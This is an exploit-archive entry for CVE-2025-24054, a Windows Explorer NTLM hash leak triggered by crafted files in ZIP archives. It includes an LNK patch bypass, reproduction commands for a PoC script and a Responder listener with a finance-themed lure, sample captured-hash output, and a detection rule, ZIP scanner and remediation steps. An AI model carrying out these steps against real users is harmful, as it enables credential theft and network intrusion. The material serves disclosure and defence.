Windows NTLM Hash Disclosure via File Explorer - CVE-2025-24054
by Untouchable17 · 2026-05-17
| Field | Value |
|---|---|
| Severity | Medium |
| CVE | CVE-2025-24054 |
| Category | binary |
| Affected product | Windows File Explorer (Windows Shell) |
| Affected versions | Windows 10, Windows 11, Windows Server — prior to March 2025 patch |
| Disclosed | 2026-05-17 |
| Patch status | patched |
Archive entry: intelseclab/poc-archive
Metadata
| Field | Value |
|---|---|
| Date Added | 2026-05-17 |
| Last Updated | 2025-11-24 |
| Author / Researcher | Untouchable17 |
| CVE / Advisory | CVE-2025-24054 |
| Category | binary |
| Severity | Medium |
| CVSS Score | 6.5 (CVSSv3) |
| Status | Patched |
| Tags | NTLM, NTLMv2, hash-disclosure, zero-click, Windows, File-Explorer, UNC, SMB, credential-theft, in-the-wild, state-sponsored |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Windows File Explorer (Windows Shell) |
| Versions Affected | Windows 10, Windows 11, Windows Server — prior to March 2025 patch |
| Language / Platform | Windows, Python 3.6+, PowerShell 5.1+ |
| Authentication Required | No |
| Network Access Required | Yes (attacker must operate a reachable SMB server to capture hashes) |
Summary
CVE-2025-24054 is a zero-click NTLMv2-SSP hash disclosure vulnerability in Windows File Explorer. When a user opens a ZIP archive containing a crafted .searchConnector-ms file, Windows Explorer automatically resolves an embedded UNC path during file preview, triggering an outbound SMB authentication attempt to an attacker-controlled server — leaking the victim’s NTLMv2 hash without any user interaction beyond opening the archive. The vulnerability was exploited in the wild since at least March 2025 by state-sponsored actors. Microsoft patched the initial vector, but the researcher also documents two subsequent patch bypasses (CVE-2025-50154 / CVE-2025-59214) using LNK files in ZIP archives. Related vulnerability: CVE-2025-24071.
Vulnerability Details
Root Cause
The fundamental security issue resides in Windows Shell’s automatic processing of embedded UNC paths within specific XML-based file formats (.searchConnector-ms, .library-ms) during preview operations. The simpleLocation/url element in a searchConnectorDescription XML document is silently resolved by the Windows Search Indexer and Explorer shell when the containing archive is opened. This processing occurs without user consent, triggering NTLM authentication to the UNC server and exposing the NTLMv2-SSP hash. The ZIP container additionally bypasses Mark-of-the-Web (MOTW) protections.
Attack Vector
Phase 1 (CVE-2025-24054 - original):
- Attacker generates a .searchConnector-ms XML payload with a UNC path pointing to the attacker SMB server.
- Payload is packaged into a ZIP archive with a socially engineered filename.
- Victim receives the ZIP via email, download, or file share and opens it in Windows Explorer.
- Explorer automatically previews the .searchConnector-ms file and resolves the UNC path.
- Windows sends NTLMv2-SSP authentication to the attacker's SMB server; the attacker captures the hash.
Phase 2 (Patch bypass - CVE-2025-50154 / CVE-2025-59214):
- After Microsoft's initial patch, the attacker creates a .lnk shortcut file with a UNC path in TargetPath.
- The LNK is packaged in a ZIP; Windows Explorer fetches icon metadata and resolves the UNC path during ZIP preview.
- The hash leaks via the same NTLMv2-SSP mechanism.
Impact
Capture of the victim’s NTLMv2 hash, which can be used for:
- Offline password cracking (hashcat, john)
- NTLM relay attacks to authenticate to other services on the network without cracking
- Lateral movement and privilege escalation in Active Directory environments
Environment / Lab Setup
OS: Windows 10 / Windows 11 (unpatched, pre-March 2025)
Target: Windows File Explorer on victim host
Attacker: Linux/Windows with Responder or Impacket SMB server
Tools: Python 3.6+, colorama, Responder / impacket-smbserver
Setup Steps
Proof of Concept
Step-by-Step Reproduction
1. Generate payload - create a ZIP containing a .searchConnector-ms file with the attacker UNC path:

    python ntml-disclosure-poc.py 192.168.1.100
    # Optional: custom output filename
    python ntml-disclosure-poc.py 192.168.1.100 -o lure_document.zip

2. Start SMB listener - capture the incoming NTLMv2-SSP hash:

    responder -I eth0 -w

3. Deliver payload - send the ZIP to the victim via email, messaging platform, or file share.
4. Victim opens ZIP - Windows Explorer automatically triggers UNC resolution; the NTLMv2 hash is captured on the attacker server.
5. Patch bypass (LNK method) - for patched systems, use patch_bypass.ps1:

    .\patch_bypass.ps1 -IP 192.168.1.100 -Lure "Finance_Report_Q4" -KeepLnk
Exploit Code
See ntml-disclosure-poc.py (Phase 1 - searchConnector method) and patch_bypass.ps1 (Phase 2 - LNK bypass) in this folder.
Expected Output
[+] Listener: 192.168.1.100
[*] Resource path: \\192.168.1.100\sharedir_1337
[*] COMPLETE Package: Project_20251123_175037.zip
[SMB] NTLMv2-SSP Client: 192.168.1.50
[SMB] NTLMv2-SSP Username: DOMAIN\victim
[SMB] NTLMv2-SSP Hash: victim::DOMAIN:...
Detection & Indicators of Compromise
SIEM / IDS Rule (example):
alert tcp any any -> !$HOME_NET 445 (msg:"Outbound SMB - possible NTLM hash leak CVE-2025-24054";
flow:established,to_server; sid:9000101;)
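A content-level check to complement the network rule above, inspecting archives for the .searchConnector-ms / .library-ms descriptors of Phase 1 and the .lnk variant of Phase 2 described under Attack Vector. This is an added example written for this entry, not code from the upstream repository; the sample archive and the EXAMPLE-ATTACKER-HOST placeholder are constructed, and the .lnk entry is a stand-in carrying only UTF-16LE path bytes, not a real shortcut.

```python
import io
import re
import zipfile
from typing import List, Tuple

# Shell descriptor types the advisory says Explorer resolves during archive
# preview: searchConnector-ms / library-ms (Phase 1) and lnk (Phase 2).
RISKY_SUFFIXES = (".searchconnector-ms", ".library-ms", ".lnk")

# UNC path "\\host\share" as ASCII/UTF-8 (XML descriptors) ...
UNC_ASCII = re.compile(rb"\\\\[A-Za-z0-9._-]+\\[A-Za-z0-9._$-]+")
# ... and as UTF-16LE, which is how LNK string data is stored.
UNC_UTF16 = re.compile(
    rb"\\\x00\\\x00(?:[A-Za-z0-9._-]\x00)+\\\x00(?:[A-Za-z0-9._$-]\x00)+")


def find_unc_targets(data: bytes) -> List[str]:
    """Return every distinct UNC target embedded in a file's bytes."""
    hits = [m.group(0).decode("latin-1") for m in UNC_ASCII.finditer(data)]
    hits += [m.group(0).decode("utf-16-le") for m in UNC_UTF16.finditer(data)]
    return sorted(set(hits))


def scan_zip(blob: bytes) -> List[Tuple[str, str]]:
    """(entry name, UNC target) for each risky entry that embeds a UNC path."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(RISKY_SUFFIXES):
                continue
            with zf.open(info) as fh:
                data = fh.read(1_000_000)  # cap: descriptors are tiny, zip bombs are not
            for target in find_unc_targets(data):
                findings.append((info.filename, target))
    return findings


def build_sample_zip() -> bytes:
    """Constructed sample archive (placeholder host, not a working lure)."""
    unc = "\\\\EXAMPLE-ATTACKER-HOST\\share"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("notes.txt", "harmless text entry")
        # Fragment with the simpleLocation/url element named under Root Cause.
        zf.writestr("Report.searchConnector-ms",
                    "<searchConnectorDescription><simpleLocation><url>"
                    + unc + "</url></simpleLocation></searchConnectorDescription>")
        # Stand-in for a shortcut: only the UTF-16LE path bytes matter to the scanner.
        zf.writestr("Report.lnk", b"L\x00\x00\x00" + unc.encode("utf-16-le"))
    return buf.getvalue()
```

Run it against archives at a mail gateway or file-share ingest point; any finding on these file types is worth quarantining, since legitimate documents rarely ship shell descriptors pointing at external hosts.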
Remediation
| Action | Detail |
|---|---|
| Patch | Apply Microsoft March 2025 cumulative update addressing CVE-2025-24054 |
| Workaround | Block outbound SMB (port 445) at perimeter firewall; disable NTLM authentication where possible |
| Config Hardening | Enable “Restrict NTLM: Outgoing NTLM traffic to remote servers” Group Policy; deploy SMB signing |
Notes
Repository implements two attack phases: the original CVE-2025-24054 vector (searchConnector-ms in ZIP) via ntml-disclosure-poc.py, and a patch bypass using LNK files in ZIP (CVE-2025-50154 / CVE-2025-59214) via patch_bypass.ps1. The Python PoC filename has a typo (ntml instead of ntlm) — preserved as-is from upstream. The patch bypass vector (LNK-in-ZIP) was active and unpatched at time of researcher publication. Requires attacker-controlled SMB server reachable from victim network — commonly used with Responder or Impacket.
Auto-ingested from https://github.com/Untouchable17/CVE-2025-24054 on 2026-05-17.